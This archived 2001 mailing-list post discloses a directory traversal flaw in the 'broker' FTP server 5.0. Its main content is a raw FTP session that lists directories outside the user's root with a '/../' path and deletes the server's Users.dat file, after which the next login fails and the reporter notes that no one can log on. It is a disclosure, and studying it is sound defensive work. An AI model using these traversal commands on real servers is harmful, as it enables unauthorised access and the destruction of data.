OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: se00020LION.CC
Date: Sat Mar 03 2001 - 12:56:23 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Vulnerability:

    users can break out of their root directory and list
    directories.
    Depending on the priv. you have other commands
    like delete maybe
    executed outside of the home. directory.

    e:\crap\ was used as homedir.
    deleting files in e:\crap is enabled

    Detail:

    Problem: Again relative paths.

    dir:
    listings directories outside of root dir.
    Risc: medium-high

    230 User test logged in.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
    movedtohomedir.txt
    -rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
    bisontest.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
    drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
    226 File sent ok
    FTP: 323 Bytes empfangen in 0,00Sekunden
    323000,00KB/s
    ftp> cd ..
    550 CWD failed. ..: No permission

    ftp> dir /../experimental/broker/data/
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw- 1 ftp ftp 175 Nov 19 2000
    UserGrps.dat
    -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54
    Users.dat
    -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33
    Users.4800.bak
    -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34
    Users.4800-Prof.bak
    -rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59
    BannCtrl.ini
    -rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08
    KickCtrl.ini
    -rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37
    Events_1.dat
    -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53
    Events_lst_1.dat
    -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie
    von Users.dat
    226 File sent ok
    FTP: 629 Bytes empfangen in 0,00Sekunden
    629000,00KB/s

    delete:
    deleting files outside of root dir.

    ftp> delete /../experimental/broker/data/users.dat
    250 File '/../experimental/broker/data/users.dat'
    deleted.
    ftp> quit
    221-Thank you for your visit.
    221-
    221 Goodbye.

    C:\>ftp 10.17.3.44
    Verbindung mit 10.17.3.44 wurde hergestellt.
    220 FTP Server ready [***]
    Benutzer (10.17.3.44:(none)): test
    331 Password required for test.
    Kennwort:
    530 Login incorrect.
    Anmeldung fehlgeschlagen.
    ftp> :(

    by deleting users.dat, noone will be able to logon ...

    put/get commands seem to be secure...

    This was tested with win2k and trail version of broker
    ver. 5.0

    se00020fhs-hagenberg.ac.at or
    se00020lion.cc